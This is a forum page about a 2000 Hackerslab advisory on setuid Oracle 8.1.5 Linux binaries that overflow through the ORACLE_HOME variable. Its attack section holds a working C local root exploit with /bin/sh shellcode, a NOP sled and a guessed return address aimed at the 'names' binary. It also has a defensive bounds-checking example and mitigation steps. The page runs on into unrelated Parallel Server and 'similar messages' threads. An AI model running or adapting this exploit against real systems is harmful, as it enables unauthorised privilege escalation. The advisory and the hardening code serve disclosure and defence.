Security vulnerability in Oracle 8.1.5

The following email was forwarded to me about possible security vulnerabilities.
I am looking for verification from both Oracle and the user community.
================================================================================
[ Hackerslab bug_paper ] Linux ORACLE 8.1.5 vulnerability
================================================================================
File : Oracle 8.1.5
SYSTEM : LINUX
Tested on RedHat Linux 6.2
INFO :
There are two security vulnerabilities in Oracle.
1. Buffer overflow
It is possible to create a buffer overflow using "ORACLE_HOME",
one of the environment variables used by Oracle.
The Oracle applications that are vulnerable to the buffer overflow are as follows:
- names
- namesctl
- onrsd
- osslogin
- tnslsnr
- tnsping
- trcasst
- trcroute
These applications allow an attacker to execute a buffer overflow exploit.
2. Log files created
When a user executes one of the Oracle applications such as names, oracle or tnslsnr,
the following log files are created.
names
======
-rw-rw-r-- 1 oracle dba 0 Oct 20 01:45 ckpcch.ora
-rw-rw-r-- 1 oracle dba 428 Oct 20 01:45 ckpreg.ora
-rw-rw-r-- 1 oracle dba 950 Oct 20 01:45 names.log
oracle
======
-rw-rw---- 1 oracle dba 616 Oct 20 05:14 ora_[running pid].trc
tnslsnr
=======
-rw-rw-r-- 1 oracle dba 2182176 Oct 20 2000 listener.log
SOLUTION
Contact your vendor for a patch, or remove the setuid permission:
# su - oracle
$ cd /oracle_8.1.5_install_directory/bin
$ chmod a-s names namesctl onrsd osslogin tnslsnr tnsping trcasst trcroute
==-------------------------------------------------------------------------------==
  [email protected] [yong-jun, kim]
  [ http://www.hackerslab.org ]
  HACKERSLAB (C) since 1999
==-------------------------------------------------------------------------------==
Oracle 8.1.5 exploit
-by loveyou
offset value : -500 ~ +500
```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUFFER 800
#define NOP 0x90
#define PATH "/hackerslab/loveyou/oracle/8.1.5/bin/names"

char shellcode[] =
/* - K2 - */
/* main: */
"\xeb\x1d"              /* jmp callz */
/* start: */
"\x5e"                  /* popl %esi */
"\x29\xc0"              /* subl %eax, %eax */
"\x88\x46\x07"          /* movb %al, 0x07(%esi) */
"\x89\x46\x0c"          /* movl %eax, 0x0c(%esi) */
"\x89\x76\x08"          /* movl %esi, 0x08(%esi) */
"\xb0\x0b"              /* movb $0x0b, %al */
"\x87\xf3"              /* xchgl %esi, %ebx */
"\x8d\x4b\x08"          /* leal 0x08(%ebx), %ecx */
"\x8d\x53\x0c"          /* leal 0x0c(%ebx), %edx */
"\xcd\x80"              /* int $0x80 */
"\x29\xc0"              /* subl %eax, %eax */
"\x40"                  /* incl %eax */
"\xcd\x80"              /* int $0x80 */
/* callz: */
"\xe8\xde\xff\xff\xff"  /* call start */
"/bin/sh";

/* Returns the current stack pointer (x86, 32-bit). */
unsigned long getesp(void)
{
    __asm__("movl %esp,%eax");
}

int main(int argc, char *argv[])
{
    char *buff, *ptr;
    long *addr_ptr, addr;
    int bsize = BUFFER;
    int i, offset;

    offset = 0;
    if (argc > 1) offset = atoi(argv[1]);

    buff = malloc(bsize);
    addr = getesp() - 5933 - offset;   /* guessed return address */

    /* fill the whole buffer with the guessed address */
    ptr = buff;
    addr_ptr = (long *) ptr;
    for (i = 0; i < bsize; i += 4)
        *(addr_ptr++) = addr;

    /* NOP sled in the first half, shellcode placed in the middle */
    memset(buff, NOP, bsize / 2);
    ptr = buff + ((bsize / 2) - (strlen(shellcode) / 2));
    for (i = 0; i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];
    buff[bsize - 1] = '\0';

    setenv("ORACLE_HOME", buff, 1);
    printf("[ offset:%d buffer=%d ret:0x%lx ]\n",
           offset, (int) strlen(buff), addr);
    system(PATH);
    return 0;
}
```
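The ORACLE_HOME overflow the advisory and exploit above describe comes from copying an environment value into a fixed-size buffer with no length check. As an added illustration, not code from the advisory or from Oracle, the following C shows that unchecked pattern beside a hardened version that validates the value before using it; the buffer size, the function names and the "/network/admin" suffix are assumptions made for the example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed size of the fixed buffer; the advisory does not state the
   real buffer size inside the Oracle binaries. */
#define PATH_BUF 256

/* Vulnerable pattern, as the advisory describes it: ORACLE_HOME is copied
   into a fixed-size buffer unbounded, so a long value overwrites the stack.
   Shown for contrast only; nothing below calls it. */
void build_admin_dir_unchecked(const char *oracle_home, char *out)
{
    char tmp[PATH_BUF];
    strcpy(tmp, oracle_home);          /* no bound on the untrusted value */
    strcat(tmp, "/network/admin");
    strcpy(out, tmp);
}

/* Hardened form: treat the environment value as untrusted input.
   Returns 0 and writes "<home>/network/admin" into out, or returns -1
   (leaving out empty) when the value is missing, not an absolute path,
   or would not fit together with the suffix and its terminator. */
int build_admin_dir_checked(const char *oracle_home, char *out, size_t outlen)
{
    static const char suffix[] = "/network/admin";
    size_t n;

    if (outlen == 0)
        return -1;
    out[0] = '\0';
    if (oracle_home == NULL || oracle_home[0] != '/')
        return -1;
    n = strlen(oracle_home);
    if (n + sizeof suffix > outlen)    /* sizeof suffix includes the NUL */
        return -1;
    memcpy(out, oracle_home, n);
    memcpy(out + n, suffix, sizeof suffix);
    return 0;
}

/* What a setuid helper should do at startup: read ORACLE_HOME and refuse
   to run, rather than overflow, when the value fails the checks. */
int read_oracle_admin_dir(char *out, size_t outlen)
{
    return build_admin_dir_checked(getenv("ORACLE_HOME"), out, outlen);
}

int main(void)
{
    char path[PATH_BUF];
    if (read_oracle_admin_dir(path, sizeof path) != 0) {
        fputs("ORACLE_HOME is unset, relative, or too long; refusing to run\n", stderr);
        return 1;
    }
    printf("admin directory: %s\n", path);
    return 0;
}
```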

Hi Peter,
I was told that Oracle8 and Oracle8i Parallel Server on IBM
RS/6000 AIX comes with its own Lock Manager and this LM does not
rely on the Cluster Lock Manager (cllockd) of HACMP for AIX, as
Oracle7 Parallel Server on normal (non-SP) RS/6000 does.
(Oracle7 Parallel Server on RS/6000 SP didn't use the cllockd of
HACMP but came with a special LM.)
Cluster-wide Filesystems are not used for OPS on Unix, as far as
I know Unix (AIX, Solaris). All Data-, Log- and Control-Files
must reside on concurrently (!) accessible Raw-Devices (e.g. Raw
Logical Volumes on AIX).
So I guess it should be possible for Oracle to port OPS to Linux.
No special Cluster-Services would be needed for OPS on Linux,
just a shared SCSI-bus (e.g.) and a fast interconnect (e.g.
100BaseT).
Peter Sechser (guest) wrote:
: Dave,
: Parallel Server needs some cluster services in order to
: communicate between several nodes. So, the operating system has
: to offer things like inter-node communication services,
: cluster-wide lock communication services and a clusterwide
: filesystem. I'm not quite sure, to what degree Linux offers/will
: offer these services.
: Peter

Similar Messages

  • RV016 - TLS Protocol Session Renegotiation Security Vulnerability

    My RV016 with firmware 3.0.2.01-tm has failed PCI compliance testing with my credit card company. They have identified that a TLS Protocol Session Renegotiation Security Vulnerability exists. I see that I have the most recent firmware version for my router and have disabled PPTP server, but I cannot get it to pass. How do I disable this feature?
    Steve

    I found the vulnerability number CVE-2009-3555.
    If you have applied the latest Critical Patch Update, you should be fine.
    Find more details here
    http://www.oracle.com/technology/deploy/security/critical-patch-updates/javacpumar2010.html
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3555

  • Iphone 3G Software Update Fixes security vulnerability associated with viewing malicious PDF files?

    Is there an Iphone 3G Software Update Fixes security vulnerability associated with viewing malicious PDF files?  Latest version I can download is 4.2.1
    I assume no fix is available, does anyone know if I'm still vulnerable to the security bug?

    No fix is needed since that vulnerability isn't in 4.2.1.

  • We use an add-on in one of our online solutions and we've identified a security vulnerability. The issue has been addressed in our latest add-ons and we would like to know how we may blocklist our previous player through a firefox update?

    We use an add-on in one of our online solutions and we've identified a security vulnerability. The issue has been addressed in our latest add-ons and we would like to know how we may blocklist our previous player through a firefox update?

    You can file a bug report to do that request.
    http://developer.mozilla.org/en/docs/Bug_writing_guidelines

  • JComboBox makes for nice security vulnerability under X11?

    I noticed a couple years ago that when I set a breakpoint inside a JComboBox state change event handler on a Java application or applet running under X11, the entire desktop would hang. Back then, I checked the Swing bug database and found an issue regarding this, but it was closed with an evaluation that pretty much simply said that the developer didn't know how to fix it.
    When I brought this up in the netbeans mailing list, someone suggested that this could be a security issue if someone intentionally/programmatically stopped all processing from within this event handler (perhaps from an applet). Perhaps, as a security vulnerability this bug would get more attention!
    Well, it's been over a year and the latest JDK 1.6b10 (build 25) still has this problem. So, obviously it's not bothering anyone, except me, enough to do anything about it. I could try to file this bug under Swing again (probably with same outcome) or try filing it as a security bug. What are people's thoughts?

    Hi
    Try going here:
    http://europe.nokia.com/A4423034
    Or alternatively : find the product pages for the 5700 by going to www.nokia.com/phones, then pick out 5700, then dip into "PC software" and "Music"
    Cheers

  • Security when using oracle text

    Hello,
    We would like to use Oracle text functionality on Oracle 10 but the System Admin told us that Oracle is accessing the filesystem with the user account who launched the oracle instance.
    He told us that this is a security problem : giving oracle password gives access to the file system.
    Is that true and is there a solution to make oracle connect to the filesystem with another linux user account ?
    Thanks a lot !

    raford wrote:
    This only applies when you use the FILE_DATASTORE to index documents on disk, rather than in the file system.
    You can restrict access to this feature by only allowing users having a specific role to use it - see
    http://download.oracle.com/docs/cd/B28359_01/text.111/b28304/cdatadic.htm#BHCBIFEA
    (NB. this is in the 11g documentation - I can't find it in the 10g manual but the functionality is the same).
    It's the database process itself which accesses the files, so it will always access them as the owner of the database process, there's no way to change that.

    What do you mean when you said "FILE_DATASTORE to index documents on disk, rather than in the file system"?

  • Multi security groups in Oracle apps hrms

    Hi All,
    Could you please let us know how to enable or disable multi security groups in Oracle Apps hrms?
    Thanks,
    Anil

    If you have access to Oracle Help-on-line check it there.
    quote: Originally posted by Amit Das ([email protected]):
    Can you please tell me of any document/book etc which describes the security features in Oracle Apps specially on Oracle financials.

  • Security features in Oracle Apps (Oracle Financials)

    Can you please tell me of any document/book etc which describes the security features in Oracle Apps specially on Oracle financials.

    If you have access to Oracle Help-on-line check it there.
    quote: Originally posted by Amit Das ([email protected]):
    Can you please tell me of any document/book etc which describes the security features in Oracle Apps specially on Oracle financials.

  • Security Measures of Oracle e-business Suite

    Hi ,
    Can anyone please provide any link/material on Security Measures of Oracle e-business Suite.
    I need this stuff pretty urgently.
    Thanks in advance,
    Sandy...

    Best Practices for Securing Oracle E-Business Suite (Metalink Note 189367.1)

  • Security Evaluation of Oracle Application Server

    Are there any published documents on security evaluation of Oracle Application Server?
    Is it secure as a tool against some attacks? For example, are the following vulnerabilities, when applicable to the server, dealt with by it, or should they be handled by the application?
    failure to restrict url access,
    broken authentication and session management
    insecure cryptographic storage,
    injection flaws
    failure to restrict directory browsing
    Are there any available documents that we can refer to on these issues?
    Regards
    Farbod

    Thank you again.
    Can you advise on this part of my message also?
    "Also I see in oracle recommended architectures that there is a firewall between each http server and application server. Does the built in OHS in OAS provide the firewall? or I need to install another firewall?"
    I am going to explain it but I think it is completely inconsistent with the thread title which I got some of my answers in, so let me start a new thread here:
    Application Server Recommended Deployment Architectures, How to?
    Thanks for your useful inputs.
    Best Regards,
    Farbod

  • Security issues on Oracle Database (10g)

    Hello,
    I need to make a security manual for Oracle (10g) databases. This has to be some sort of checklist to assure a database is secure. I am thinking of encryption, least privilege, limit access, etc etc. I am sure this has been done before. Please help me with links to documents about this.
    Kind regards,
    Rob Schenk

    (Funny thing - Oracle has hired people to write documentation and has placed it online for anyone to read.)
    You just might find what you need in the "Security Guide" at http://www.oracle.com/pls/db102/portal.portal_db?selected=1
    If documentation is not sufficient, I recommend http://www.amazon.com/gp/product/0974372749/

  • Security Rules in Oracle Financials GL

    I have defined security rules in Oracle Financials GL version 11.0.3. The security rules can be applied in form level.
    e.g For account inquiry, only limited accounts can be viewed.
    But for all reports in Oracle Financials, it's not restricted by the rules. How can I apply those rules in reports as well?

    Unfortunately data in standard and bespoke oracle reports is not restricted by security rules by default.
    Security can be enabled for FSG reports.
    If you need security rules to be applied to standard reports, I am afraid, you need customization.

  • Applying security patch to Oracle 10G on Linux

    Hello,
    I'm new to Oracle DBA world, need to apply security patch to Oracle 10G on Linux server, any tips and notes would be appreciated.
    thanks
    Sam

    Manish,
    1. I have to upgrade the database version from 10.2.0.2 to 10.2.0.4 on Linux. Is there any proper documentation which will help me out?
    Please refer to the following document.
    Note: 454750.1 - Oracle Apps Release 12 with Oracle Database 10.2.0 interoperability notes
    https://metalink.oracle.com/metalink/plsql/ml2_documents.showDocument?p_database_id=NOT&p_id=454750.1
    2. What are the types of oracle database patches? what is the proper procedure to apply those kind of patches to Oracle 10g on Linux?
    Most of the patches in this upgrade are database patches (which should be applied using opatch). The main upgrade patch (Patch 6810189 - 10.2.0.4 patch set) should be applied using Oracle Universal Installer (runInstaller).
    Always follow the steps in the patch README file before applying any patch.
    Regards,
    Hussein

  • CVE-2000-0649 Security Vulnerability

    I have 2 NW 6.5 SP8 servers which are running HTTPSTK (version 4.03 9/4/08) PORTAL (version 4.03 9/22/08). I am trying to pass a security scan and a security vulnerability on ports 8008 and ports 8009 has been identified, issue CVE-2000-0649, whereby my internal IP addresses may be exposed.
    Is there a later version of HTTPSTK and PORTAL which address this security vulnerability, or do I need to close ports 8008 and 8009 via my firewall?

    Did you read the CVE... the one from eleven years ago? First clue that
    this is, as usual, bogus:
    <quote>
    IIS 4.0 allows remote attackers to obtain the internal IP address of the
    server via an HTTP 1.0 request for a web page which is protected by basic
    authentication and has no realm defined.
    </quote>
    If you're really concerned have your security assessors prove the issue is
    real by exploiting the vulnerability.
    Good luck.
    On 06/27/2011 10:36 AM, flakestar wrote:
    >
    > I have 2 NW 6.5 SP8 servers which are running HTTPSTK (version 4.03
    > 9/4/08) PORTAL (version 4.03 9/22/08). I am trying to pass a security
    > scan and a security vulnerability on ports 8008 and ports 8009 has been
    > identified, issue CVE-2000-0649, whereby my internal IP addresses may be
    > exposed.
    >
    > Is there a later version of HTTPSTK and PORTAL which address this
    > security vulnerability, or do I need to close ports 8008 and 8009 via my
    > firewall?

  • HT202802 What "security vulnerability" will be opened by using this signing technique?

    Regarding article: HT202802
    OS X: Using AppleScript with Accessibility and Security features in Mavericks - Apple Support
    The article says:
    Important: Signing an applet using the following method introduces a security vulnerability that could allow malicious software to use Accessibility without user permission.
    1. What "security vulnerability" will be opened by using this signing technique?
    2. Does signing this way only make the App its applied to vulnerable only? and then the whole computer vulnerable depending on how extensive the app's reach is to the rest of the computer?
    3. More information: My app only relates to the Reminders app and bunch of Finder items....nothing internet based, etc.  That being said, is this still a vulnerability to my computer?
    "Note: If you have your own signing identity, you may use that identity in place of “-” for the -s option." 
    1. What is "my own signing identity?" and if I don't have one, would it add security to get one and use it here?
    Thanks for the help in advance!

    1) There are a few system features, including accessibility, that will override any and all other security protections on your machine. This is the vulnerability. In giving the script the ability to control your machine, you give control of your machine to the script.
    2) By signing the script, that control is permanent. If the app doesn't do anything malicious, there is no problem. But malicious apps sometimes don't manifest until later.
    3) Did you write the app? If so, then there is nothing to worry about. If not, then how much do you trust the author of the app?
    Generally, this isn't too big a deal. Apple is very protective, but most people generally hand over their passwords to anyone. They shouldn't, of course, but generally they do. They don't realize the extent to which they have handed over control of their machine and all of their data. Apple is trying to point that out.
